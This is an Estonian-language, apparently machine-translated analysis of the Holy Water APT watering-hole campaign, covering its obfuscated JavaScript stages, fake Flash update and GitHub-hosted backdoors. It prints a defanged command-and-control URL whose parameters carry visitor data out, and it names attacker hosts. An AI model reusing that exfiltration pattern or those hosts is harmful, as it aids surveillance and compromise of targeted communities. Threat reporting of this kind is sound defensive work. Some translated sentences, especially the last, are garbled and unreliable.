Püha vesi APT

Holy Water APT on nimi, mis anti küberkurjategijate rühmale, kes korraldas rea veeaugu tüüpi rünnakuid Aasia usu- ja etnilise rühma vastu. Selle konkreetse rünnaku TTP-d (taktikad, tehnikad ja protseduurid) ei saanud omistada ühelegi juba tuntud ATP (Advanced Persistent Threat) osalejale, mistõttu teadlased jõudsid järeldusele, et tegemist on uue küberkurjategijate grupiga, millel on väike ja paindlik häkkerite meeskond.

Veeaugu rünnaku läbiviimiseks sihivad kurjategijad mitut veebisaiti, mida määratud sihtmärgid sageli külastavad. Saidid võivad kuuluda sihtrühma kuuluvatele organisatsioonidele, heategevusorganisatsioonidele või mõjukatele isikutele. Kõik Holy Wateri ohustatud veebisaidid majutati samas serveris ja hõlmasid muu hulgas religioosset isiksust, heategevusprogrammi, vabatahtliku teenistuse programmi ja õiglase kaubanduse organisatsiooni.

Rünnak hõlmas mitut etappi

Ohustatud veebisaiti külastades siseneb kasutaja esimesse ründefaasi, mis koosneb rikutud JavaScriptist nimega (script|jquery)-css.js ja mis on hägustatud Hiina-põhise veebiteenuse Sojsoniga. Selle skripti ülesanne on kindlaks teha, kas kasutaja on kehtiv sihtmärk, ja selleks hakkab kasulik koormus külastaja kohta andmeid kraapima ja saatma need välisserverisse aadressil loginwebmailnic.dynssl[.]com HTTP GET-päringute kaudu:

https://loginwebmailnic.dynssl[.]com/all/content.php?jsoncallback=&lanip=&wanip=&urlpath=&_=

Serveri vastus tagastab tõese või väära tulemuse ja kui väärtus on tõene, käivitatakse ründe järgmine etapp; muidu ei juhtu midagi.

Teises etapis JavaScripti nimega (script|jquery)-file.js, mis taaskord samal viisil hägustatakse. Seekord kasutasid häkkerid aga v4 asemel Sojsoni v5. Holy Water APT ei kasuta kasutaja nakatamiseks ära ühtegi tarkvara haavatavust ega nõrkust. Selle asemel luuakse hüpikaken, mis pakub Flash-mängija värskendust ja potentsiaalne ohver peab nõustuma faili allalaadimisega.

Holy Water APT pahavaratööriistade arsenali hostiti GitHubis

Kui kasutaja lubab võlts-Flash-värskendusel jätkata, loob see ühenduse mitteaktiivse GitHubi hoidlaga, mis asub aadressil github.com/AdobeFlash32/FlashUpdate . Sellesse kohta salvestati neli erinevat tööriistakomplekti – installipakett, tagaukse pahavara, mille nimetasid teadlased Godlike12, ja kaks versiooni avatud lähtekoodiga Pythoni tagauksest, mida tuntakse nime all Stitch ja mida häkkerid muutsid laiendatud funktsionaalsusega. Värskenduspakett on NSIS-i installiprogramm, mis eemaldab seadusliku Windows Flash Playeri installiprogrammi, ja etapitööriista, mida kasutatakse tegeliku kasuliku koormuse laadimiseks. Godlike12 tagauks on kirjutatud Go keeles ja seda kasutatakse Google Drive'i kanali juurutamiseks Command and Control (C&C, C2) serverites. Mis puudutab Stitch tagaukse variante, siis lisaks tavalistele tagaukse tegevustele, nagu teabe ja paroolide kogumine, tegevuste logimine, failide allalaadimine jne, lisas Püha vee grupp võimaluse laadida alla seaduslik Adobe Flashi installiprogramm, et automaatvärskendusi teha. end saidilt ubntrooters.serveuser.com ja saavutage ajastatud toimingute abil püsivus.